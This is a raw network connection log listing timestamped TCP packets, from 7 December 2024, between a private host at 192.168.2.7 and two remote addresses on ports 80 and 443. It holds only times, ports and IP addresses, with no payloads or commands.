Dec 7, 2024 12:59:59.833640099 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.833692074 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.833808899 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.833854914 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.836515903 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.836560011 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.836680889 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.836724043 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.872320890 CET	443	49828	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:59.875319958 CET	443	49828	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:59.875382900 CET	49828	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:59.875461102 CET	49828	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:59.875469923 CET	443	49828	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:59.875509977 CET	49828	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:59.875515938 CET	443	49828	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:59.878201008 CET	49834	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:59.878225088 CET	443	49834	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:59.878318071 CET	49834	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:59.878449917 CET	49834	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:59.878460884 CET	443	49834	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:59.940085888 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.940146923 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.940226078 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.940269947 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.940989017 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.941036940 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.941154003 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.941195965 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.943190098 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.943242073 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.944077969 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.944123030 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.944348097 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.944391966 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.946664095 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.946732044 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.946903944 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.946952105 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.948901892 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.948956966 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.949131012 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.949184895 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.951278925 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.951334953 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.951492071 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.951534986 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.953612089 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.953669071 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.953834057 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.953880072 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.955919027 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.955980062 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.956096888 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.956139088 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.958152056 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.958205938 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.958379984 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.958437920 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.960366964 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.960417032 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.960555077 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.960606098 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.962568998 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.962618113 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.962766886 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.962816954 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.964797974 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.964847088 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.964952946 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.964998960 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.966873884 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.966918945 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.967077971 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.967127085 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.969114065 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.969177008 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.969258070 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.969302893 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.971538067 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.971580029 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.971745014 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.971784115 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.973649025 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.973689079 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.973774910 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.973813057 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.975572109 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.975627899 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.975745916 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.975791931 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.977857113 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.977893114 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.978017092 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.978056908 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.979867935 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.979907990 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.980067015 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.980108023 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.982135057 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.982188940 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.982330084 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.982378960 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.984201908 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.984246016 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.984404087 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.984442949 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.986388922 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.986428976 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.986542940 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.986584902 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.988537073 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.988581896 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.988861084 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.988902092 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.990777969 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.990818024 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.990942001 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.990981102 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.992888927 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.992928028 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.993144035 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.993182898 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.995177984 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.995281935 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.995393038 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.995436907 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.997215033 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.997260094 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.997416973 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.997454882 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.999459028 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.999500036 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 12:59:59.999707937 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 12:59:59.999756098 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.001549006 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.001594067 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.001769066 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.001828909 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.003895044 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.003937960 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.004086018 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.004120111 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.006104946 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.006221056 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.006382942 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.006428957 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.008024931 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.008086920 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.008223057 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.008260012 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.010207891 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.010248899 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.010410070 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.010448933 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.012336969 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.012378931 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.012531996 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.012582064 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.014498949 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.014549017 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.014722109 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.014760017 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.016674995 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.016721010 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.016865969 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.016905069 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.018836021 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.018883944 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.019057035 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.019100904 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.021003962 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.021047115 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.021205902 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.021245003 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.023170948 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.023211956 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.023385048 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.023423910 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.025330067 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.025377035 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.025614023 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.025659084 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.027496099 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.027537107 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.027673006 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.027712107 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.029670000 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.029714108 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.029860020 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.029907942 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.031847000 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.031891108 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.032066107 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.032110929 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.034028053 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.034074068 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.034188032 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.034231901 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.036256075 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.036315918 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.036488056 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.036533117 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.038328886 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.038387060 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.038551092 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.038595915 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.040524006 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.040601969 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.040677071 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.040719986 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.042661905 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.042720079 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.042879105 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.043059111 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.044859886 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.044914961 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.045051098 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.045099020 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.047100067 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.047161102 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.047292948 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.047343016 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.049184084 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.049237967 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.049360037 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.049401999 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.051311016 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.051388979 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.051477909 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.051526070 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.131762028 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.131855965 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.131890059 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.131934881 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.132266045 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.132318020 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.132549047 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.132601023 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.134109020 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.134159088 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.134414911 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.134463072 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.135942936 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.135996103 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.136162996 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.136214018 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.138065100 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.138119936 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.138322115 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.138375998 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.139652014 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.139700890 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.139857054 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.139905930 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.141602039 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.141652107 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.141868114 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.141916037 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.143043041 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.143166065 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.143167973 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.143214941 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.144690037 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.144743919 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.145042896 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.145092964 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.146322012 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.146378994 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.146513939 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.146563053 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.148004055 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.148056984 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.148221970 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.148271084 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.149749041 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.149818897 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.149930000 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.149981976 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.151289940 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.151338100 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.151504993 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.151551962 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.152899027 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.152954102 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.153112888 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.153161049 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.154587984 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.154653072 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.154853106 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.154900074 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.156122923 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.156172037 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.156260014 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.156307936 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.157752991 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.157795906 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.157892942 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.157939911 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.159564018 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.159615993 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.159693956 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.159740925 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.161072969 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.161120892 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.161170006 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.161222935 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.162297964 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.162349939 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.162533045 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.162584066 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.163809061 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.163861990 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.164021015 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.164069891 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.165316105 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.165370941 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.165503025 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.165550947 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.166814089 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.166866064 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.167040110 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.167090893 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.168390989 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.168443918 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.168570995 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.168621063 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.169863939 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.169934988 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.169959068 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.170066118 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.171226025 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.171277046 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.171654940 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.171699047 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.172732115 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.172775984 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.172904015 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.172951937 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.174132109 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.174182892 CET	49829	80	192.168.2.7	185.215.113.16
